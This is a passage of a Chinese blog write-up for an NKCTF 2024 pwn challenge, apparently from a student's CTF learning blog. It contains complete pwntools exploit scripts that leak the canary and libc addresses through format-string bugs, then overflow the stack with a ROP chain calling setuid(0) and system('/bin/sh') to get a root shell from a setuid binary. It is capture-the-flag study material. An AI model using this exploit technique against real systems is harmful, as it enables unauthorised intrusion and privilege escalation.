class="comment">#为了暴露程序指令的真实地址</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%9$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">cx_libc=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;cx_libc: &#x27;</span>,<span class="built_in">hex</span>(cx_libc))</span><br><span class="line"></span><br><span class="line">cx_base=cx_libc-<span class="number">0x1b25</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;cx_base: &#x27;</span>,<span class="built_in">hex</span>(cx_base))</span><br><span class="line"><span class="comment">#暴露栈地址（这个和上面那个其实都可以不要）</span></span><br><span class="line"></span><br><span class="line">syscall = base_libc + <span class="number">0x0000000000091316</span></span><br><span class="line">pop_rax = base_libc + <span class="number">0x0000000000045eb0</span></span><br><span class="line"></span><br><span class="line">read_cx=<span class="number">0x1150</span></span><br><span class="line">puts_cx=<span class="number">0x1110</span></span><br><span class="line">bss_cx=<span class="number">0x5070</span></span><br><span class="line">leave_cx=<span class="number">0x19E8</span></span><br><span class="line">main_cx=<span class="number">0x1984</span></span><br><span class="line">main=main_cx+cx_base</span><br><span class="line">leave=leave_cx+cx_base</span><br><span class="line"></span><br><span class="line">exe = base_libc + <span class="number">0xebc8</span></span><br><span class="line">puts = cx_base + <span class="number">0x4FB0</span></span><br><span class="line"><span class="built_in">str</span> = base_libc + <span class="built_in">next</span>(elo.search(<span class="built_in">bytes</span>(<span class="string">&#x27;/bin/sh&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)))</span><br><span class="line">sys_ = base_libc + elo.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">ret = base_libc + <span class="number">0x29139</span> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;leqave: &#x27;</span>,<span class="built_in">hex</span>(leave))</span><br><span class="line">read_plt=read_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;read_plt: &#x27;</span>,<span class="built_in">hex</span>(read_plt))</span><br><span class="line">puts_plt=puts_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;puts_plt: &#x27;</span>,<span class="built_in">hex</span>(puts_plt))</span><br><span class="line">bss=bss_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;bss: &#x27;</span>,<span class="built_in">hex</span>(bss))</span><br><span class="line"></span><br><span class="line">setuid_libc=elo.symbols[<span class="string">&#x27;setuid&#x27;</span>]</span><br><span class="line">setuid=setuid_libc+base_libc</span><br><span class="line"><span class="comment">#cat os.setuid(0)</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;A&#x27;</span>*<span class="number">0x28</span>+p64(canary)+p64(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#栈溢出的基本准备，从输入到canary的长度的垃圾数据+canary的值+覆盖ebp的8字节垃圾数据</span></span><br><span class="line"></span><br><span class="line">payload += flat(ret,pop_rdi_ret, <span class="built_in">str</span>, ret,sys_)</span><br><span class="line"><span class="comment">#以此在栈溢出后执行system（/bin/sh）然后获得shell</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>使用如上的脚本然后攻击便可以拿到服务器的shell但是当你直接运行这个拿到shell准备开始读取flag文件是会发现权限不足，并且在其中将chmod等加权的命令禁止，这里便是我看来这道提最为难受的地方，以及拿到shell但由于flag文件的读取需要root权限导致到嘴的鸭子没了，就眼睁睁看着flag文件就在面前却读取不了，当时在比赛中这题我到这里是已经是最后10分钟了，由于我在之前并没有接触过这个东西，因此及时到结束都依然存在flag读不出来这个问题。</p>
<img src="/2024/03/28/hxctf/image-20240328205758246.png" alt="image-20240328205758246" style="zoom:67%;">





<p>后来在学长的指导下才知道这个知识点，也算是收货了一波新知识。</p>
<p>关于这个知识先来看一个点，在拿到shell后由于ls类命令还是可以使用的边可以看看个个文件的权限。用<code>ls -l</code>d的指令</p>
<p><img src="/2024/03/28/hxctf/image-20240325200803566.png" alt="image-20240325200803566"></p>
<p>在这里边更可以看出此时的flag文件只有一个root用户的rw权限，而此时我们的权限只是一个低用户的权限，故我们并不能之前读取这个文件，同时这个里面还将chmod等加权命令禁止了，故必须想其他的办法，我们便从新看看这个各各文件的权限，会发现在pwn这个文件中有一个其他文件都没有的权限s，而pwn正是我们所攻击的文件，或许这个pwn文件的s权限说不定便是一个比较特殊的突破口。</p>
<p>首先来小小的介绍这个s权限是什么（大量源于网上内容，可能不真）</p>
<p>s权限： 设置使文件在执行阶段具有文件所有者的权限，相当于临时拥有文件所有者的身份. 典型的文件是passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码.</p>
<p>  举个简单的例子，某个可执行文件foo，如果起所有者为root，在其权限为普通的x的时候，该文件被执行的时候，是以执行该文件的用户权限在执行。但是将其设置为s的时候，该文件被执行就是以root权限来执行了。</p>
<p>s权限的作用：表示对文件具用可执行权限的用户将使用文件拥有者的权限或文件拥有者所在组的权限在对文件进行执行</p>
<p>简单来说就是当一个文件拥有s权限后便可以在通过一下特殊的执行后可以获得root的用户权限</p>
<p>诶，这一听是不是刚刚好，只要我们能通过这个特殊的调用然后执行这个文件不就刚刚好有root权限级的shell从而能读取flag的内容，可是问题在于这个特殊的调用是什么？</p>
<p>正是<strong>setuid 位</strong></p>
<p>当使用 setuid （设置用户 ID）位时，之前描述的行为会有所变化，所以当一个可执行文件启动时，它不会以启动它的用户的权限运行，而是<strong>以该文件所有者的权限运行</strong>。所以，如果在一个可执行文件上设置了 setuid 位，并且该文件由 root 拥有，当一个普通用户启动它时，它将以 root 权限运行。显然，如果 setuid 位使用不当的话，会带来潜在的安全风险。</p>
<p>使用 setuid 权限的可执行文件的例子是 <code>passwd</code>，我们可以使用该程序更改登录密码。我们可以通过使用 <code>ls</code> 命令来验证：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ls -l /bin/passwd</span><br><span class="line">-rwsr-xr-x. 1 root root 27768 Feb 11 2017 /bin/passwd</span><br></pre></td></tr></table></figure>



<p>简单来说就是，就是使用setuid函数，准确来说便是在栈溢出后执行setuid（0），然后再执行system（&#x2F;bin&#x2F;sh）</p>
<p>便可以拿到有root级的shell，而这个setuid函数可以直接在libc库中寻找</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">elo=ELF(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">setuid_libc=elo.symbols[<span class="string">&#x27;setuid&#x27;</span>]    </span><br><span class="line">setuid=setuid_libc+base_libc</span><br><span class="line">payload=flat(pop_rdi_ret,<span class="number">0</span>,stuid,用于拿到shell的过程)   </span><br></pre></td></tr></table></figure>



<p>因此这道题的完整版exp为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&quot;./pwn1&quot;</span>)</span><br><span class="line"><span class="comment">#p = remote(&quot;node.nkctf.yuzhian.com.cn&quot;, 38793 )</span></span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span> ,arch = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p,&#x27;b $rebase(0x19e8)&#x27;)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"><span class="comment">#在这题中由于开启了PIE保护，故要下断点必须加上$rebase()</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    p.sendline(<span class="string">&#x27;111.0 SSS+&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"><span class="comment">#以上是进入漏洞函数</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%11$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">canary =<span class="built_in">int</span>(p.recv(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;canary: &#x27;</span>,<span class="built_in">hex</span>(canary))</span><br><span class="line"><span class="comment">#将canary的值暴露出来，方便栈溢出</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"><span class="comment">#为了回到main函数中，随便读入数据进去</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%33$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">libc_start_main_128=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc_start_main_128: &#x27;</span>,<span class="built_in">hex</span>(libc_start_main_128))</span><br><span class="line">libc_start_main=libc_start_main_128-<span class="number">128</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc_start_main: &#x27;</span>,<span class="built_in">hex</span>(libc_start_main))</span><br><span class="line"><span class="comment">#将libc_base的值暴露出来，先随便暴露一个函数的got表地址</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#elo=ELF(&#x27;/usr/lib/x86_64-linux-gnu/libc.so.6&#x27;)</span></span><br><span class="line">elo=ELF(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">libc_start_main_libc=elo.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;__libc_start_main_libc&#x27;</span>,<span class="built_in">hex</span>(libc_start_main_libc))</span><br><span class="line">open_libc=elo.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;open_libc&#x27;</span>,<span class="built_in">hex</span>(open_libc))</span><br><span class="line">setuid_libc=elo.symbols[<span class="string">&#x27;setuid&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#通过链接libc库从而找到暴露的函数的偏移量，以及需要的函数的偏移量</span></span><br><span class="line"></span><br><span class="line">pop_rdi_ret_libc=<span class="number">0x2a3e5</span></span><br><span class="line">pop_rsi_ret_libc=<span class="number">0x2be51</span></span><br><span class="line">pop_rbp_ret_libc=<span class="number">0x2a2e0</span></span><br><span class="line">pop_rdx_pop_r12_ret_libc=<span class="number">0x11f2e7</span></span><br><span class="line"><span class="comment">#在库中找到的pop指令，便于payload的使用</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">base_libc=libc_start_main-libc_start_main_libc</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;base_libc&#x27;</span>,<span class="built_in">hex</span>(base_libc))</span><br><span class="line"><span class="built_in">open</span> = open_libc+base_libc</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;open: &#x27;</span>,<span class="built_in">hex</span>(<span class="built_in">open</span>))</span><br><span class="line"></span><br><span class="line">pop_rdi_ret=pop_rdi_ret_libc+base_libc</span><br><span class="line">pop_rsi_ret=pop_rsi_ret_libc+base_libc</span><br><span class="line">pop_rbp_ret=pop_rbp_ret_libc+base_libc</span><br><span class="line">pop_rdx_pop_r12_ret=pop_rdx_pop_r12_ret_libc+base_libc</span><br><span class="line"><span class="comment">#确定真实地址</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%8$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">zhan=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;zhen: &#x27;</span>,<span class="built_in">hex</span>(zhan))</span><br><span class="line">flag=zhan-<span class="number">0x70</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;flag: &#x27;</span>,<span class="built_in">hex</span>(flag))</span><br><span class="line"><span class="comment">#为了暴露程序指令的真实地址</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%9$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">cx_libc=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;cx_libc: &#x27;</span>,<span class="built_in">hex</span>(cx_libc))</span><br><span class="line"></span><br><span class="line">cx_base=cx_libc-<span class="number">0x1b25</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;cx_base: &#x27;</span>,<span class="built_in">hex</span>(cx_base))</span><br><span class="line"><span class="comment">#暴露栈地址（这个和上面那个其实都可以不要）</span></span><br><span class="line"></span><br><span class="line">syscall = base_libc + <span class="number">0x0000000000091316</span></span><br><span class="line">pop_rax = base_libc + <span class="number">0x0000000000045eb0</span></span><br><span class="line"></span><br><span class="line">read_cx=<span class="number">0x1150</span></span><br><span class="line">puts_cx=<span class="number">0x1110</span></span><br><span class="line">bss_cx=<span class="number">0x5070</span></span><br><span class="line">leave_cx=<span class="number">0x19E8</span></span><br><span class="line">main_cx=<span class="number">0x1984</span></span><br><span class="line">main=main_cx+cx_base</span><br><span class="line">leave=leave_cx+cx_base</span><br><span class="line"></span><br><span class="line">exe = base_libc + <span class="number">0xebc8</span></span><br><span class="line">puts = cx_base + <span class="number">0x4FB0</span></span><br><span class="line"><span class="built_in">str</span> = base_libc + <span class="built_in">next</span>(elo.search(<span class="built_in">bytes</span>(<span class="string">&#x27;/bin/sh&#x27;</span>, <span class="string">&#x27;utf-8&#x27;</span>)))</span><br><span class="line">sys_ = base_libc + elo.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">ret = base_libc + <span class="number">0x29139</span> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;leqave: &#x27;</span>,<span class="built_in">hex</span>(leave))</span><br><span class="line">read_plt=read_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;read_plt: &#x27;</span>,<span class="built_in">hex</span>(read_plt))</span><br><span class="line">puts_plt=puts_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;puts_plt: &#x27;</span>,<span class="built_in">hex</span>(puts_plt))</span><br><span class="line">bss=bss_cx+cx_base</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;bss: &#x27;</span>,<span class="built_in">hex</span>(bss))</span><br><span class="line"></span><br><span class="line">setuid_libc=elo.symbols[<span class="string">&#x27;setuid&#x27;</span>]</span><br><span class="line">setuid=setuid_libc+base_libc</span><br><span class="line"><span class="comment">#cat os.setuid(0)</span></span><br><span class="line"><span class="comment">#获得setuid函数的地址</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;A&#x27;</span>*<span class="number">0x28</span>+p64(canary)+p64(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#栈溢出的基本准备，从输入到canary的长度的垃圾数据+canary的值+覆盖ebp的8字节垃圾数据</span></span><br><span class="line"></span><br><span class="line">payload += flat(ret,pop_rdi_ret,<span class="number">0</span>,setuid,pop_rdi_ret, <span class="built_in">str</span>, ret,sys_)</span><br><span class="line"><span class="comment">#以此在栈溢出后先执行setuid(0)，然后在执行system（/bin/sh）然后获得root级shell，便可以直接用cat flag将flag读出来</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>





<p>终于写完关于这道题的wp，虽然有的地方比较省，不过那些都是一些比较基本的东西，应该都能看懂的吧。</p>
<p>做了一天，wp一天，所幸还是有所收获，这就好，前途漫漫亦灿灿。</p>
<p><img src="/2024/03/28/hxctf/image-20240328214024472.png" alt="image-20240328214024472"></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/03/30/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          数组越界
        
      </div>
    </a>
  
  
    <a href="/2024/03/27/%E5%8D%9A%E5%AE%A2%E4%B9%8B%E7%97%9B/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">博客之痛</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="hxctf" data-title="NKctf2024 第一题" data-url="https://2023478.github.io/2024/03/28/hxctf/"  data-images="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" data-content="NKctf2024 第一题">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2024 wgiegie
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>